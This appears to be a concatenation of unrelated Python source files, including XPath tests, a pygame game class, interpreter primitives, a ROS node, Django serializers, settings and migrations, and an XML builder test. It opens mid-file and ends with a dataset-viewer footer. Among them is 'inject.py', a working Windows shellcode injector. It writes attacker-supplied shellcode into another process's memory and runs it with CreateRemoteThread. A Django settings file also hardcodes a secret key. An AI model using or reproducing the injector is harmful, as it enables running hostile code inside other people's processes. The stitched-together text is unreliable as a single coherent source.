assert xpath.xpb.elem.attribute_contains('a', 'complet').apply_(tree) != []
def test_text_contains():
element_text = "cool stuff44"
tree = etree.XML("<top><elem>{0}</elem><elem></elem>"
"<elem>other things</elem></top>".format(element_text))
result = xpath.xpb.elem.text_contains_("stuff").text_.apply_(tree)
result_text, = result
assert result_text == element_text
result = xpath.xpb.elem.text_contains_("afdsafdsa").text_.apply_(tree)
assert result == []
|
import pygame
from Game.Shared import GameConstants
from Game.Bricks import Brick
from Game.Ball import Ball
class BallSpawningBrick(Brick):
def __init__(self, position, game, points=400, color=(150, 150, 150),
sprite=pygame.Surface(GameConstants.BRICK_SIZE)):
super(BallSpawningBrick, self).__init__(position, game, points=points,
color=color, sprite=sprite)
pygame.font.init()
font = pygame.font.Font(None, 16)
renderedText = font.render("Extra", True, (0, 0, 0))
textWidth, textHeight = renderedText.get_size()
blitX = int(GameConstants.BRICK_SIZE[0] / 2.0) - int(textWidth / 2.0)
blitY = int(GameConstants.BRICK_SIZE[1] / 2.0) - int(textHeight / 2.0)
self.sprite.blit(renderedText, (blitX, blitY))
def hit(self, ball):
super(BallSpawningBrick,self).hit(ball)
positionX = self.position[0] + int(GameConstants.BRICK_SIZE[0] / 2.0) - int(GameConstants.BALL_SIZE[0] / 2.0)
positionY = self.position[1] + int(GameConstants.BRICK_SIZE[1] / 2.0) - int(GameConstants.BALL_SIZE[1] / 2.0)
self.game.balls.append(Ball(self.game, position=(positionX, positionY)))
|
from som.interp_type import is_ast_interpreter
from som.primitives.primitives import Primitives
from som.vm.globals import trueObject, falseObject, nilObject
from som.vmobjects.primitive import UnaryPrimitive, BinaryPrimitive, TernaryPrimitive
if is_ast_interpreter():
from som.vmobjects.block_ast import AstBlock as _Block
else:
from som.vmobjects.block_bc import BcBlock as _Block
def _not(_rcvr):
return falseObject
def _or(_rcvr, _arg):
return trueObject
def _and_and_if_true(_rcvr, arg):
if isinstance(arg, _Block):
block_method = arg.get_method()
return block_method.invoke_1(arg)
return arg
def _if_false(_rcvr, _arg):
return nilObject
def _if_true_if_false(_rcvr, true_block, _false_block):
if isinstance(true_block, _Block):
block_method = true_block.get_method()
return block_method.invoke_1(true_block)
return true_block
class TruePrimitivesBase(Primitives):
def install_primitives(self):
self._install_instance_primitive(UnaryPrimitive("not", _not))
self._install_instance_primitive(BinaryPrimitive("or:", _or))
self._install_instance_primitive(BinaryPrimitive("||", _or))
self._install_instance_primitive(BinaryPrimitive("and:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("&&", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifTrue:", _and_and_if_true))
self._install_instance_primitive(BinaryPrimitive("ifFalse:", _if_false))
self._install_instance_primitive(
TernaryPrimitive("ifTrue:ifFalse:", _if_true_if_false)
)
|
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/droid/component/shared_advanced_droid_frame.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
import rospy
from geometry_msgs.msg import Twist
def callback_function(data):
#FILL IN HERE
global publisher_name, msg
msg.linear.x = -data.linear.x
msg.angular.z = -data.angular.z
publisher_name.publish(msg)
def subscriber_name():
# Initialize node
rospy.init_node('subscriber_name', anonymous=True)
#FILL IN HERE
global publisher_name,msg
msg = Twist()
publisher_name = rospy.Publisher('remapped_topic_name',Twist,queue_size = 16)
rospy.Subscriber('turtle1/cmd_vel', Twist, callback_function)
rospy.Rate(30)
rospy.spin()
if __name__ == '__main__':
try:
subscriber_name()
except rospy.ROSInterruptException:
pass
|
from django.http import HttpRequest
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
try:
from allauth.account import app_settings as allauth_settings
from allauth.utils import (email_address_exists,
get_username_max_length)
from allauth.account.adapter import get_adapter
from allauth.account.utils import setup_user_email
except ImportError:
raise ImportError("allauth needs to be added to INSTALLED_APPS.")
from rest_framework import serializers
from requests.exceptions import HTTPError
if 'allauth.socialaccount' in settings.INSTALLED_APPS:
from allauth.socialaccount.helpers import complete_social_login
class SocialLoginSerializer(serializers.Serializer):
access_token = serializers.CharField(required=False, allow_blank=True)
code = serializers.CharField(required=False, allow_blank=True)
def _get_request(self):
request = self.context.get('request')
if not isinstance(request, HttpRequest):
request = request._request
return request
def get_social_login(self, adapter, app, token, response):
"""
:param adapter: allauth.socialaccount Adapter subclass.
Usually OAuthAdapter or Auth2Adapter
:param app: `allauth.socialaccount.SocialApp` instance
:param token: `allauth.socialaccount.SocialToken` instance
:param response: Provider's response for OAuth1. Not used in the
:returns: A populated instance of the
`allauth.socialaccount.SocialLoginView` instance
"""
request = self._get_request()
social_login = adapter.complete_login(request, app, token, response=response)
social_login.token = token
return social_login
def validate(self, attrs):
view = self.context.get('view')
request = self._get_request()
if not view:
raise serializers.ValidationError(
_("View is not defined, pass it as a context variable")
)
adapter_class = getattr(view, 'adapter_class', None)
if not adapter_class:
raise serializers.ValidationError(_("Define adapter_class in view"))
adapter = adapter_class(request)
app = adapter.get_provider().get_app(request)
# More info on code vs access_token
# http://stackoverflow.com/questions/8666316/facebook-oauth-2-0-code-and-token
# Case 1: We received the access_token
if attrs.get('access_token'):
access_token = attrs.get('access_token')
# Case 2: We received the authorization code
elif attrs.get('code'):
self.callback_url = getattr(view, 'callback_url', None)
self.client_class = getattr(view, 'client_class', None)
if not self.callback_url:
raise serializers.ValidationError(
_("Define callback_url in view")
)
if not self.client_class:
raise serializers.ValidationError(
_("Define client_class in view")
)
code = attrs.get('code')
provider = adapter.get_provider()
scope = provider.get_scope(request)
client = self.client_class(
request,
app.client_id,
app.secret,
adapter.access_token_method,
adapter.access_token_url,
self.callback_url,
scope
)
token = client.get_access_token(code)
access_token = token['access_token']
else:
raise serializers.ValidationError(
_("Incorrect input. access_token or code is required."))
social_token = adapter.parse_token({'access_token': access_token})
social_token.app = app
try:
login = self.get_social_login(adapter, app, social_token, access_token)
complete_social_login(request, login)
except HTTPError:
raise serializers.ValidationError(_('Incorrect value'))
if not login.is_existing:
login.lookup()
login.save(request, connect=True)
attrs['user'] = login.account.user
return attrs
class RegisterSerializer(serializers.Serializer):
username = serializers.CharField(
max_length=get_username_max_length(),
min_length=allauth_settings.USERNAME_MIN_LENGTH,
required=allauth_settings.USERNAME_REQUIRED
)
email = serializers.EmailField(required=allauth_settings.EMAIL_REQUIRED)
password1 = serializers.CharField(write_only=True)
password2 = serializers.CharField(write_only=True)
def validate_username(self, username):
username = get_adapter().clean_username(username)
return username
def validate_email(self, email):
email = get_adapter().clean_email(email)
if allauth_settings.UNIQUE_EMAIL:
if email and email_address_exists(email):
raise serializers.ValidationError(
_("A user is already registered with this e-mail address."))
return email
def validate_password1(self, password):
return get_adapter().clean_password(password)
def validate(self, data):
if data['password1'] != data['password2']:
raise serializers.ValidationError(_("The two password fields didn't match."))
return data
def custom_signup(self, request, user):
pass
def get_cleaned_data(self):
return {
'username': self.validated_data.get('username', ''),
'password1': self.validated_data.get('password1', ''),
'email': self.validated_data.get('email', '')
}
def save(self, request):
adapter = get_adapter()
user = adapter.new_user(request)
self.cleaned_data = self.get_cleaned_data()
adapter.save_user(request, user, self)
self.custom_signup(request, user)
setup_user_email(request, user, [])
return user
class VerifyEmailSerializer(serializers.Serializer):
key = serializers.CharField()
|
import binascii
import sys
from ctypes import *
if len(sys.argv) < 3:
print("usage inject.py <shellcodefile.bin> <pid>")
sys.exit(1)
file = open(sys.argv[1],'rb')
buff=file.read()
file.close()
print("buffer length = ")
print(len(buff))
print("pid = "+sys.argv[2])
handle = windll.kernel32.OpenProcess(0x1f0fff,0, int(sys.argv[2]))
if (handle == 0):
print("handle == 0")
sys.exit(1)
addr = windll.kernel32.VirtualAllocEx(handle,0,len(buff),0x3000|0x1000,0x40)
if(addr == 0):
print("addr = = 0")
sys.exit(1)
bytes = c_ubyte()
windll.kernel32.WriteProcessMemory(handle, addr , buff, len(buff), byref(bytes))
handle1=windll.kernel32.CreateRemoteThread(handle , 0x0, 0x0 , addr, 0x0,0x0 , 0x0)
if(handle1 == 0):
print("handle1 = = 0");
sys.exit(1)
windll.kernel32.CloseHandle(handle)
|
import os
PROJECT_ROOT = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(PROJECT_ROOT, 'dev.db'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
MEDIA_ROOT = ''
MEDIA_URL = ''
ADMIN_MEDIA_PREFIX = '/media/'
SECRET_KEY = '44mxeh8nkm^ycwef-eznwgk&8_lwc!j9r)h3y_^ypz1iom18pa'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'testautoslug.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'testapp',
)
|
import zmq
class JRPC:
def __init__(self):
self.id = 0
def make_noti(self, method, params=None):
noti = {"jsonrpc":"2.0", "method":method}
if params is not None:
noti["params"] = params
return noti
def make_req(self, method, params=None):
req = self.make_noti(method, params)
req["id"] = self.id
self.id += 1
return req
zctx = zmq.Context.instance()
zsock = zctx.socket(zmq.REQ)
zsock.connect("tcp://127.0.0.1:10000")
jrpc = JRPC()
req = jrpc.make_req("echo", [10, 5])
zsock.send_json(req)
rep = zsock.recv_json()
assert(rep['result']==req['params'])
req = jrpc.make_req("counter")
zsock.send_json([req]*10)
batchrep = zsock.recv_json()
counts = [rep['result'] for rep in batchrep]
for k in range(1,len(counts)):
assert counts[k] - counts[k-1] == 1
batchreq = []
for k in range(10):
batchreq.append(jrpc.make_req("sum", range(1+k)))
zsock.send_json(batchreq)
batchrep = zsock.recv_json()
for k in range(10):
assert(batchrep[k]['result']==sum(range(1+k)))
a = range(3)
o = {1:1, 2:2, 3:3}
d = { "one": "un", "two": 2, "three": 3.0, "four": True, "five": False, "six": None, "seven":a, "eight":o }
req = jrpc.make_noti("iterate", d)
zsock.send_json(req)
rep = zsock.recv()
assert not rep
req = jrpc.make_noti("iterate", a)
zsock.send_json(req)
rep = zsock.recv()
assert not rep
req = jrpc.make_noti("foreach", d)
zsock.send_json(req)
rep = zsock.recv()
assert not rep
req = jrpc.make_noti("foreach", a)
zsock.send_json(req)
rep = zsock.recv()
assert not rep
|
""" Discover Cambridge Audio StreamMagic devices. """
from . import SSDPDiscoverable
class Discoverable(SSDPDiscoverable):
"""Add support for discovering Cambridge Audio StreamMagic devices."""
def get_entries(self):
"""Get all Cambridge Audio MediaRenderer uPnP entries."""
return self.find_by_device_description({
"manufacturer": "Cambridge Audio",
"deviceType": "urn:schemas-upnp-org:device:MediaRenderer:1"
})
|
"""Script to display a collection of paths after inserting one new path
Usage:
add_to_a_path.py [-U] PATHS PATH
add_to_a_path.py [-U] (-s | -i INDEX ) PATHS PATH
Options:
-h, --help Show this help and exit
-v, --version Show version number and exit
-s, --start Add the path at start of list of paths
-i INDEX, --index=INDEX The index at which the path will be inserted
Examples of use:
$ export PATH=/bin:/usr/bin
$ add_to_a_path.py PATH /usr/local/bin
PATH=/bin:/usr/bin:/usr/local/bin
$ add_to_a_path.py PATH /usr/local/bin --start
PATH=/usr/local/bin:/bin:/usr/bin
"""
from __future__ import print_function
import os
import sys
import argparse
from bdb import BdbQuit
__version__ = '0.1.0'
class ScriptError(NotImplementedError):
pass
def version():
print('%s %s' % (args, __version__))
raise SystemExit
def parse_args():
"""Parse out command line arguments"""
parser = argparse.ArgumentParser(description=__doc__.splitlines()[0])
parser.add_argument('symbol', help='The bash symbol to be changed')
parser.add_argument('path', help='The path to be added')
parser.add_argument('-s', '--start', action='store_true',
help='Add the path at start of list of paths')
parser.add_argument('-i', '--index', type=int,
help='The index at which the path will be inserted')
parser.add_argument('-v', '--version', action='store_true',
help='Show version')
args = parser.parse_args()
if args.version:
version()
if not args.index:
if args.start:
args.index = 0
else:
args.index = False
return args
def _add_symbol_to_paths(paths, symbol, i):
if i is False:
i = len(paths)
result = paths[:]
if not symbol:
return result
if symbol not in result:
result.insert(i, symbol)
return result
j = result.index(symbol)
if i != j:
del result[j]
result.insert(i, symbol)
return result
def get_arg_path(args):
path = args.path
if not path:
return ''
user_path = os.path.expanduser(path)
real_path = os.path.realpath(user_path)
if not os.path.isdir(real_path):
return ''
return real_path
def split_paths(string):
if not string:
return []
return [p for p in string.split(os.path.pathsep) if p]
def get_paths(args):
symbol = args.symbol
paths_string = ''
if symbol in os.environ:
paths_string = os.environ[symbol]
elif os.path.pathsep in symbol:
paths_string = symbol
return split_paths(paths_string)
def script(args):
arg_path = get_arg_path(args)
paths = get_paths(args)
if not arg_path:
if not paths:
return False
elif os.path.isdir(arg_path):
if arg_path in paths:
paths.remove(arg_path)
paths = _add_symbol_to_paths(paths, arg_path, args.index)
else:
return False
print('='.join((args.symbol, os.path.pathsep.join(paths))))
return True
def main():
"""Run the script"""
try:
args = parse_args()
return os.EX_OK if script(args) else not os.EX_OK
except (SystemExit, BdbQuit):
pass
return os.EX_OK
if __name__ == '__main__':
sys.exit(main())
|
import os.path
import SCons.Tool
import aql
_Warning = aql.Warning
_Tool = SCons.Tool.Tool
def generate( env ):
toolsets = (
"aql_tool_gcc",
"aql_tool_msvc",
#~ "aql_tool_bcc"
)
for tool in toolsets:
tool = _Tool( tool )
if tool.exists( env ):
tool( env )
return
_Warning("C/C++ toolchain has not been found.")
default_tool_name = os.path.splitext( os.path.basename( __file__ ) )[0]
env['TOOLS'].remove( default_tool_name )
def exists(env):
return 1
|
from setuptools import setup
from os import path, environ
from sys import argv
here = path.abspath(path.dirname(__file__))
try:
if argv[1] == "test":
environ['PYTHONPATH'] = here
except IndexError:
pass
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='libfs',
version='0.1',
description='Library Filesystem',
long_description=long_description,
author='Christof Hanke',
author_email='christof.hanke@induhviduals.de',
url='https://github.com/ya-induhvidual/libfs',
packages=['Libfs'],
license='MIT',
install_requires=['llfuse', 'mutagenx'],
test_suite="test/test_all.py",
scripts=['scripts/libfs.py'],
keywords='fuse multimedia',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: Linux',
'Topic :: System :: Filesystems'
],
)
|
from __future__ import with_statement
import unittest
from xml.etree.ElementTree import fromstring
from xmlbuilder import XMLBuilder
def xmlStructureEqual(xml1,xml2):
tree1 = fromstring(xml1)
tree2 = fromstring(xml2)
return _xmlStructureEqual(tree1,tree2)
def _xmlStructureEqual(tree1,tree2):
if tree1.tag != tree2.tag:
return False
attr1 = list(tree1.attrib.items())
attr1.sort()
attr2 = list(tree2.attrib.items())
attr2.sort()
if attr1 != attr2:
return False
return tree1.getchildren() == tree2.getchildren()
result1 = \
"""
<root>
<array />
<array len="10">
<el val="0" />
<el val="1">xyz</el>
<el val="2">abc</el>
<el val="3" />
<el val="4" />
<el val="5" />
<sup-el val="23">test </sup-el>
</array>
</root>
""".strip()
class TestXMLBuilder(unittest.TestCase):
def testShift(self):
xml = (XMLBuilder() << ('root',))
self.assertEqual(str(xml),"<root />")
xml = XMLBuilder()
xml << ('root',"some text")
self.assertEqual(str(xml),"<root>some text</root>")
xml = XMLBuilder()
xml << ('root',{'x':1,'y':'2'})
self.assert_(xmlStructureEqual(str(xml),"<root x='1' y='2'>some text</root>"))
xml = XMLBuilder()
xml << ('root',{'x':1,'y':'2'})
self.assert_(xmlStructureEqual(str(xml),"<root x='1' y='2'></root>"))
xml = XMLBuilder()
xml << ('root',{'x':1,'y':'2'})
self.assert_(not xmlStructureEqual(str(xml),"<root x='2' y='2'></root>"))
xml = XMLBuilder()
xml << ('root',"gonduras.ua",{'x':1,'y':'2'})
self.assert_(xmlStructureEqual(str(xml),"<root x='1' y='2'>gonduras.ua</root>"))
xml = XMLBuilder()
xml << ('root',"gonduras.ua",{'x':1,'y':'2'})
self.assert_(xmlStructureEqual(str(xml),"<root x='1' y='2'>gonduras.com</root>"))
#---------------------------------------------------------------------------
def testWith(self):
xml = XMLBuilder()
with xml.root(lenght = 12):
pass
self.assertEqual(str(xml),'<root lenght="12" />')
xml = XMLBuilder()
with xml.root():
xml << "text1" << "text2" << ('some_node',)
self.assertEqual(str(xml),"<root>text1text2<some_node /></root>")
#---------------------------------------------------------------------------
def testFormat(self):
x = XMLBuilder('utf-8',format = True)
with x.root():
x << ('array',)
with x.array(len = 10):
with x.el(val = 0):
pass
with x.el('xyz',val = 1):
pass
x << ("el","abc",{'val':2}) << ('el',dict(val=3))
x << ('el',dict(val=4)) << ('el',dict(val='5'))
with x('sup-el',val = 23):
x << "test "
self.assertEqual(str(x),result1)
if __name__ == '__main__':
unittest.main()
|
import autoslug.fields
import common.utils
import datetime
from django.conf import settings
import django.contrib.postgres.fields
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
import open_humans.storage
import private_sharing.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('open_humans', '0003_auto_20151223_1827'),
('oauth2_provider', '__first__'),
('open_humans', '0004_member_badges'),
]
operations = [
migrations.CreateModel(
name='DataRequestProject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_study', models.BooleanField(choices=[(True, 'Study'), (False, 'Activity')], help_text='A "study" is doing human subjects research and must have Institutional Review Board approval or equivalent ethics board oversight. Activities can be anything else, e.g. data visualizations.', verbose_name='Is this project a study or an activity?')),
('name', models.CharField(max_length=100, verbose_name='Project name')),
('leader', models.CharField(max_length=100, verbose_name='Leader(s) or principal investigator(s)')),
('organization', models.CharField(max_length=100, verbose_name='Organization or institution')),
('contact_email', models.EmailField(max_length=254, verbose_name='Contact email for your project')),
('info_url', models.URLField(verbose_name='URL for general information about your project')),
('short_description', models.CharField(max_length=140, verbose_name='A short description')),
('long_description', models.TextField(max_length=1000, verbose_name='A long description')),
('active', models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], default=True, help_text='"Active" status is required to perform authorization\nprocesses, including during drafting stage. If a project is not active,\nit won\'t show up in listings, and new data sharing authorizations cannot occur.\nProjects which are "active" but not approved may have some information shared\nin an "In Development" section, so Open Humans members can see potential\nupcoming studies.')),
('badge_image', models.ImageField(blank=True, help_text="A badge that will be displayed on the user's profile once they've connected your project.", max_length=1024, storage=open_humans.storage.PublicStorage(), upload_to=private_sharing.models.badge_upload_path)),
('request_sources_access', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), help_text='List of sources this project is requesting access to on Open Humans.', size=None, verbose_name="Data sources you're requesting access to")),
('request_message_permission', models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], help_text='Permission to send messages to the member. This does not grant access to their email address.', verbose_name='Are you requesting permission to message users?')),
('request_username_access', models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], help_text="Access to the member's username. This implicitly enables access to anything the user is publicly sharing on Open Humans. Note that this is potentially sensitive and/or identifying.", verbose_name='Are you requesting Open Humans usernames?')),
('approved', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('api_access_secret', models.CharField(max_length=64)),
],
options={
'verbose_name_plural': 'Data request activities',
},
),
migrations.CreateModel(
name='DataRequestProjectMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id_code', models.CharField(max_length=16)),
('message_permission', models.BooleanField()),
('username_shared', models.BooleanField()),
('sources_shared', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), size=None)),
('member', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='open_humans.Member')),
],
),
migrations.CreateModel(
name='OAuth2DataRequestProject',
fields=[
('datarequestproject_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='private_sharing.DataRequestProject')),
('enrollment_url', models.URLField(help_text="The URL we direct members to if they're interested in sharing data with your project.", verbose_name='Enrollment URL')),
('redirect_url', models.CharField(help_text='The return URL for our "authorization code" OAuth2 grant\n process. You can <a target="_blank" href="">read more about OAuth2\n "authorization code" transactions here</a>.', max_length=256, verbose_name='Redirect URL')),
('application', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.OAUTH2_PROVIDER_APPLICATION_MODEL)),
],
options={
'verbose_name': 'OAuth2 data request project',
},
bases=('private_sharing.datarequestproject',),
),
migrations.CreateModel(
name='OnSiteDataRequestProject',
fields=[
('datarequestproject_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='private_sharing.DataRequestProject')),
('consent_text', models.TextField(help_text='The "informed consent" text that describes your project to Open Humans members.')),
('post_sharing_url', models.URLField(blank=True, help_text='If provided, after authorizing sharing the\nmember will be taken to this URL. If this URL includes "PROJECT_MEMBER_ID"\nwithin it, we will replace that with the member\'s project-specific\nproject_member_id. This allows you to direct them to an external survey you\noperate (e.g. using Google Forms) where a pre-filled project_member_id field\nallows you to connect those responses to corresponding data in Open Humans.', verbose_name='Post-sharing URL')),
],
options={
'verbose_name': 'On-site data request project',
},
bases=('private_sharing.datarequestproject',),
),
migrations.AddField(
model_name='datarequestprojectmember',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='project_members', to='private_sharing.DataRequestProject'),
),
migrations.AddField(
model_name='datarequestproject',
name='coordinator',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='open_humans.Member'),
),
migrations.AlterField(
model_name='datarequestproject',
name='long_description',
field=models.TextField(max_length=1000, verbose_name='A long description (1000 characters max)'),
),
migrations.AlterField(
model_name='datarequestproject',
name='short_description',
field=models.CharField(max_length=140, verbose_name='A short description (140 characters max)'),
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='member',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='open_humans.Member'),
),
migrations.RenameField(
model_name='datarequestprojectmember',
old_name='user_id_code',
new_name='project_member_id',
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='project_member_id',
field=models.CharField(max_length=16, unique=True),
),
migrations.AlterField(
model_name='datarequestproject',
name='request_sources_access',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), default=list, help_text='List of sources this project is requesting access to on Open Humans.', size=None, verbose_name="Data sources you're requesting access to"),
),
migrations.AlterField(
model_name='datarequestproject',
name='active',
field=models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], default=True, help_text='"Active" status is required to perform authorization\nprocesses, including during drafting stage. If a project is not active, it\nwon\'t show up in listings, and new data sharing authorizations cannot occur.\nProjects which are "active" but not approved may have some information shared\nin an "In Development" section, so Open Humans members can see potential\nupcoming studies.'),
),
migrations.AddField(
model_name='datarequestprojectmember',
name='created',
field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2016, 3, 4, 5, 14, 50, 931889, tzinfo=utc)),
preserve_default=False,
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='message_permission',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='sources_shared',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), default=list, size=None),
),
migrations.AlterField(
model_name='datarequestprojectmember',
name='username_shared',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='datarequestproject',
name='slug',
field=autoslug.fields.AutoSlugField(editable=False, populate_from='name', unique=True),
),
migrations.AddField(
model_name='datarequestprojectmember',
name='revoked',
field=models.BooleanField(default=False),
),
migrations.AlterModelOptions(
name='datarequestproject',
options={},
),
migrations.AddField(
model_name='datarequestprojectmember',
name='authorized',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='datarequestproject',
name='slug',
field=autoslug.fields.AutoSlugField(always_update=True, editable=False, populate_from='name', unique=True),
),
migrations.AddField(
model_name='datarequestproject',
name='is_academic_or_nonprofit',
field=models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], default=False, verbose_name='Is this institution or organization an academic institution or non-profit organization?'),
preserve_default=False,
),
migrations.AddField(
model_name='datarequestprojectmember',
name='consent_text',
field=models.TextField(blank=True),
),
migrations.RemoveField(
model_name='datarequestproject',
name='api_access_secret',
),
migrations.AddField(
model_name='datarequestproject',
name='master_access_token',
field=models.CharField(default=common.utils.generate_id, max_length=64),
),
migrations.AddField(
model_name='datarequestprojectmember',
name='joined',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='datarequestproject',
name='request_sources_access',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), blank=True, default=list, help_text='List of sources this project is requesting access to on Open Humans.', size=None, verbose_name="Data sources you're requesting access to"),
),
migrations.AlterField(
model_name='datarequestproject',
name='organization',
field=models.CharField(blank=True, max_length=100, verbose_name='Organization or institution'),
),
migrations.AddField(
model_name='datarequestproject',
name='returned_data_description',
field=models.CharField(blank=True, help_text="Leave this blank if your project doesn't plan to add or return new data for your members.", max_length=140, verbose_name='Description of data you plan to upload to member accounts (140 characters max)'),
),
migrations.AlterField(
model_name='datarequestproject',
name='active',
field=models.BooleanField(choices=[(True, 'Yes'), (False, 'No')], default=True, help_text='"Active" status is required to perform authorization\nprocesses, including during drafting stage. If a project is not active, it\nwon\'t show up in listings of activities that can be joined by participants, and\nnew data sharing authorizations cannot occur. Projects which are "active" but\nnot approved may have some information shared in an "In Development" section,\nso Open Humans members can see potential upcoming studies. Removing "active"\nstatus from a project will not remove any uploaded files from a project\nmember\'s profile.'),
),
migrations.AddField(
model_name='datarequestproject',
name='token_expiration_date',
field=models.DateTimeField(default=private_sharing.models.now_plus_24_hours),
),
migrations.AddField(
model_name='datarequestproject',
name='token_expiration_disabled',
field=models.BooleanField(default=False),
),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.